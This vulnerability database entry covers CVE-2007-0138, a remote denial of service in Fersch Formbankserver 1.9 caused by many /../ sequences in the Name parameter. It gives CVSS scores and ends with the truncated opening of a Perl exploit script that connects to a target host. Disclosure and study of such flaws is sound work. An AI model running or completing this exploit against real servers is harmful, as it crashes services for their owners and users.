5
CVSSv2

CVE-2007-0138

Published: 09/01/2007 Updated: 29/07/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

formbankcgi.exe in Fersch Formbankserver 1.9, when the PATH_INFO begins with (1) AbfrageForm or (2) EingabeForm, allows remote malicious users to cause a denial of service (daemon crash) via multiple requests containing many /../ sequences in the Name parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

fersch formbankserver 1.9

Exploits

#!perl #Vulnerability found by Bl0od3r #visit dc3dlam to see more exploits #wwwferschde/formbankserver/ #download:wwwdownload-tippde/cgi-bin/jumpcgi?ID=8796 - Hide quoted text - use IO::Socket; use warnings; package exploit; sub new { bless {} } sub bar { my $self = shift; $self->{host}=$ARGV[0]; $self-&gt ...